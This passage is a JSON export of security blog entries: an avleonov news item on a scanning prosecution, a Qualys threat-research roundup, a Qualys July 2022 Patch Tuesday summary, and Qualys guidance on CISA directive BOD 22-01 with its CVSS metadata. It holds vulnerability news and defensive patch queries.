This facility is a \u201ccritical infrastructure\u201d object and the actions of a support technician are classified as an attack on critical infrastructure. He can spend up to 7 years in prison. Why he personally and not his employer? That guy worked remotely from home and scanned from his personal IP address.\n\nA pretty crazy story, but it shows the circumstances of "penetration testing" or "bughunting" without getting all necessary formal permissions. It also shows how, in theory, a person could be easily framed as an attacker if that person's personal device is compromised. Also, I don't think port scanning or banner grabbing is actually an attack, IMHO this is normal network activity. And I don't think that checking the default passwords is always an attack, but it is a topic for discussion. In fact it doesn't matter what I or we think, it's only law enforcement practice that matters, and that practice can be pretty harsh. So keep that in mind and don't scan the unknown hosts that don't belong to you unless you want sudden problems.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T21:38:46", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday August 2021, Phishers Started Using reCAPTCHA, Scan 1 IP and Go to Jail", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-19T21:38:46", "id": "AVLEONOV:3530747E605445686B7211B2B0853579", "href": "https://avleonov.com/2021/08/20/security-news-microsoft-patch-tuesday-august-2021-phishers-started-using-recaptcha-scan-1-ip-and-go-to-jail/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-09-13T00:03:22", "description": "Welcome to the first edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. We will endeavor to issue these update reports regularly, as often as every other week, or as our threat intelligence output warrants. \n\n\n\n## Threat Intelligence from the Qualys Blog\n\nHere is a roundup of the most interesting blogs from the Qualys Research Team from the past couple of weeks: \n\n * New Qualys Research Report: [Evolution of Quasar RAT](<https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat>) \u2013 This free downloadable report gives a sneak peek of the detailed webinar topic that Qualys Threat Research team\u2019s Linux EDR expert Viren Chaudari will be presenting on our upcoming [Threat Thursdays webinar](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>). 
\n * Here\u2019s a [Simple Script to Detect the Stealthy Nation-State BPFDoor](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor>) \u2013 In this blog we explain how a simple script can detect BPFDoor. \n * Introducing [Qualys CyberSecurity Asset Management 2.0](<https://www.qualys.com/apps/cybersecurity-asset-management/>) with natively integrated [External Attack Surface Management](<https://blog.qualys.com/qualys-insights/2022/07/28/attack-surface-management-a-critical-pillar-of-cybersecurity-asset-management>) \u2013 This is big news! We offer one of only a few solutions on the market that empower cybersecurity teams to manage internal and external assets at the same time! For our existing customers, [Qualys CSAM API Best Practices](<https://blog.qualys.com/product-tech/2022/08/05/qualys-api-best-practices-cybersecurity-asset-management-api>) should be a good starting point for playing with our extensive list of APIs. \n * [August 2022 Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday>) \u2013 Microsoft and the second Tuesday of the month are inseparable (except that one time in 2017 just before the Equation Group leak!). This is our regular monthly coverage of the vulnerabilities that Microsoft and Adobe fixed this month. \n\n## New Threat Hunting Tools & Techniques\n\n**Sysmon v14.0, AccessEnum v1.34, and Coreinfo v3.53**: This is a major update to Sysmon that adds a new `event ID 27 - FileBlockExecutable` that prevents processes from creating executable files in specified locations. What this means is that if you want to block executable files from being written into a certain directory, you can do so. [Get these tools & updates](<https://docs.microsoft.com/en-us/sysinternals/downloads/>). \n\n**Bomber:** All of us know how important software bills of materials (SBOMs) are, and the vulnerabilities that affect them even more so. 
This open-source repository tool that we\u2019ve evaluated will help you scan JSON formatted SBOM files to point out any vulnerabilities they may have. [Check out Bomber](<https://github.com/devops-kung-fu/bomber>). \n\n**Alan C2 Framework:** Until recently, this command & control (C2) framework \u2013 even though it was hosted on GitHub \u2013 was closed source. You could download it and test it for free, but not inspect its source code unless you decompiled it. Now the source code has been made available. For example, you can now look at the [certificate information](<https://github.com/enkomio/AlanFramework/blob/8134494037435c5e6478409447efe41f563e0688/src/client/mbedtls/tests/data_files/dir-maxpath/c20.pem>) and add it to your detection pipeline if you have not already done so. [Access the Alan C2 Framework source code](<https://github.com/enkomio/AlanFramework>). \n\n**FISSURE**: This interesting Radio Frequency (RF) framework was released as open source at the recently concluded DEFCONference. With this reverse engineering RF framework, you can detect, classify signals, execute attacks, discover protocols, and analyze vulnerabilities. A lot can be done with this tool! [Check out FISSURE](<https://github.com/ainfosec/FISSURE>). \n\n**Sub7 Legacy**: The source code to your favorite trojan from the not-so-recent past is now available. Well, not really. This is a complete remake of the trojan from the early 2000\u2019s. The look & feel is still the same \u2013 minus the malicious features, but it does make one nostalgic. Here\u2019s hoping that threat actor groups don\u2019t use this Delphi source code for new and nefarious use cases! [Check out the new Sub7 Legacy](<https://github.com/DarkCoderSc/SubSeven>). \n\n**Hashview**: What do you do when you dump a hash via Mimikatz and want to crack it? In a team engagement, a tool like Hashview can help. It allows you to automate hashcat, retroactively crack hashes, and get notifications on a particular event. 
[Check out the Hashview source code](<https://github.com/hashview/hashview>). \n\n**Center for Internet Security:** CIS published their August update for the [End-of-Support Software Report List](<https://www.cisecurity.org/insights/blog/end-of-support-software-report-list>). Use it coupled with Qualys CSAM to stay updated on software that\u2019s no longer vendor supported. \n\n## New Vulnerabilities \n\n[**CVE-2022-34301**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34301>)/[**CVE-2022-34302**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34302>)/[**CVE-2022-34303**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34303>) \u2013 Not much was known about these bootloader vulnerabilities when they were first disclosed as part of Microsoft Patch Tuesday. New research about these vulnerabilities was [presented at DEFCON](<https://eclypsium.com/2022/08/11/vulnerable-bootloaders-2022/>) pointing towards weaknesses in third-party code signed by Microsoft. Special care must be given to fixing these vulnerabilities, as manual intervention is required for complete remediation. \n\n[**CVE-2022-30209**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30209>) \u2013 Fresh off of its disclosure at Black Hat USA 2022, this _IIS authentication bypass vulnerability_ discovered by Devcore is [introduced](<https://twitter.com/orange_8361/status/1557504677050478594?s=20&t=KnnUPgzWitsV-dCEdSeCjA>) by a logic error resulting from improper copy/pasting of variable names. Qualys VMDR customers can find unpatched devices in their networks by looking for QID 91922 in their results. \n\n[**CVE-2022-22047**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>) \u2013 This Windows client/server runtime subsystem (CSRSS) _elevation of privilege vulnerability_ affects almost all Windows versions, including v7, 8.1, 10, 11, and Windows Server 2008, 2012, 2016, 2019, and 2022! QIDs 91922 and 91927 should be of interest to current Qualys VMDR customers. 
\n\n[**CVE-2022-26138**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26138>) \u2013 The Confluence Questions app, when installed, creates a `disabledsystemuser` user with a known and now _publicized hardcoded password_. Post exploitation, bad actors can read the pages accessible by the confluence-users group. \n\n[**CVE-2022-26501**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26501>) \u2013 Proof-of-concept code for this _unauthenticated remote code execution_ vulnerability affecting Veeam Distribution Service (VDS) has been available for more than four months now. When last checked on Shodan, there were more than 18,000 publicly facing devices that host Veeam Backup Services. \n\n## Introducing the Monthly Threat Thursdays Webinar \n\nPlease join us for the first [Threat Thursdays monthly webinar](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) where the Qualys Threat Research Team will present the latest threat intelligence\u2026 each and every month! \n\n[REGISTER NOW](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T21:00:00", "type": "qualysblog", "title": "Introducing Qualys Threat Research Thursdays", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047", "CVE-2022-26138", "CVE-2022-26501", "CVE-2022-30209", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303"], "modified": "2022-09-01T21:00:00", "id": "QUALYSBLOG:AE4AA7402829D66599C8A25E83DD0FD2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). 
Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. 
(Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. 
If you do not have either of these versions of RDP installed on Windows 7 SP1 or Windows Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to 
trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). 
Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities: 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. 
Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. 
\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-